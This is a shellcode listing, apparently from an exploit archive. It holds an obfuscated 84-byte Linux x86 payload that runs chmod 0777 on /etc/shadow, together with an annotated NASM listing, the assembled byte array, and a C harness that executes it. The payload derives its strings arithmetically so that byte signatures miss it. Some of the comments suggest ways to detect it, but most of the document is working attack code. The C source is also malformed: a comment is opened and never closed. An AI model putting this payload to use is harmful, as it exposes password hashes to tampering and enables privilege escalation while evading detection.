Shellcode - Linux/x86 - chmod 0777 /etc/shadow obfuscated (84 bytes)

2015-03-16 12:05:09

/*
* Linux x86 - execve chmod 0777 /etc/shadow
* Obfuscated version - 84 bytes
* Original: http://shell-storm.org/shellcode/files/shellcode-828.php
* Author: xmgv
* Details: https://xmgv.wordpress.com/2015/03/13/slae-6-polymorphic-shellcode/
*/

/*
; NASM syntax, 32-bit Linux, int 0x80 system-call interface.
;
; Analyst notes. Execution order is _start -> two -> three -> four -> end;
; the blocks are laid out out of order and chained with short jumps.
; No path or program name appears as a literal: every 4-byte string chunk
; is derived from the previous value of eax by add/sub/inc, so a byte
; signature for "/etc" or "chmod" does not match the assembled payload.
; The strings that end up on the stack are "///bin/chmod", "0777" and
; "/etc//shadow" (extra slashes pad each string to a multiple of 4 bytes),
; so monitoring that compares literal paths should normalise repeated
; slashes, or key on the resulting execve / mode change of the shadow file.
;
; Register roles:
;   edx = 0            string terminator, argv terminator and envp (NULL)
;   eax = rolling value the next string chunk is computed from
;   esi -> "/etc//shadow"   ebp -> "0777"   ebx -> "///bin/chmod"
;   ecx -> argv array built in `four`
global _start

section .text

_start:
sub edx, edx                    ; edx = 0
push edx                        ; NUL terminator for the path string
mov eax, 0xb33fb33f
sub eax, 0x3bd04ede             ; eax = 0x776f6461 = "adow"
push eax
jmp short two

end:
int 0x80                        ; eax = 11 (execve): execve(ebx, ecx, edx)

four:
; Build argv on the stack, last element first.
push edx                        ; argv[3] = NULL
push esi                        ; argv[2] -> "/etc//shadow"
push ebp                        ; argv[1] -> "0777"
push ebx                        ; argv[0] -> "///bin/chmod"
mov ecx, esp                    ; ecx = argv
push byte 0xc
pop eax
dec eax                         ; eax = 0xc - 1 = 0xb, the execve number, never written literally
jmp short end

three:
push edx                        ; NUL terminator for the mode string
sub eax, 0x2c3d2dff             ; 0x6374652f -> 0x37373730 = "0777"
push eax
mov ebp, esp                    ; ebp -> "0777"
push edx                        ; NUL terminator for the program path
add eax, 0x2d383638             ; -> 0x646f6d68 = "hmod"
push eax
sub eax, 0x013ffeff             ; -> 0x632f6e69 = "in/c"
push eax
sub eax, 0x3217d6d2
add eax, 0x31179798             ; net -0x01003f3a -> 0x622f2f2f = "///b"
push eax
mov ebx, esp                    ; ebx -> "///bin/chmod"
jmp short four

two:
sub eax, 0x0efc3532             ; 0x776f6461 -> 0x68732f2f = "//sh"
push eax
sub eax, 0x04feca01
inc eax                         ; -> 0x6374652f = "/etc"
push eax
mov esi, esp                    ; esi -> "/etc//shadow"
jmp short three

#include <stdio.h>
#include <string.h>

/*
 * Assembled form of the listing in the comment above: 84 bytes, emitted in
 * source order (_start, end, four, three, two). The string literal adds a
 * trailing NUL, and none of the 84 payload bytes is 0x00.
 * The array is a writable, initialised global, so it is data, not code.
 */
unsigned char code[] =
"\x29\xd2\x52\xb8\x3f\xb3\x3f\xb3\x2d\xde\x4e\xd0\x3b\x50\xeb\x33\xcd\x80"
"\x52\x56\x55\x53\x89\xe1\x6a\x0c\x58\x48\xeb\xf2\x52\x2d\xff\x2d\x3d\x2c"
"\x50\x89\xe5\x52\x05\x38\x36\x38\x2d\x50\x2d\xff\xfe\x3f\x01\x50\x2d\xd2"
"\xd6\x17\x32\x05\x98\x97\x17\x31\x50\x89\xe3\xeb\xcf\x2d\x32\x35\xfc\x0e"
"\x50\x2d\x01\xca\xfe\x04\x40\x50\x89\xe6\xeb\xca";


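/*
 * Test harness: prints the payload length, then calls the byte array as if
 * it were a function.
 *
 * code[] is ordinary writable data. Where non-executable data (NX/DEP) is
 * enforced, the indirect call below faults instead of running the bytes;
 * that mitigation is what stops this harness as written.
 * If the payload does run, it ends in execve, so on success control never
 * comes back to main.
 */
int main() {
    /*
     * strlen() stops at the first NUL byte, so the figure equals the payload
     * size only because the payload contains no zero bytes. strlen() returns
     * size_t, which needs %zu (passing it to %d is undefined behaviour), and
     * the cast avoids passing unsigned char * where const char * is expected.
     */
    printf("Shellcode Length: %zu\n", strlen((const char *)code));

    /* Data-to-function pointer cast: not guaranteed by ISO C, works on the targeted platform only. */
    int (*ret)() = (int(*)())code;
    ret();

    /* Reached only if the call returns, i.e. the execve inside the payload failed. */
    return 0;
}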
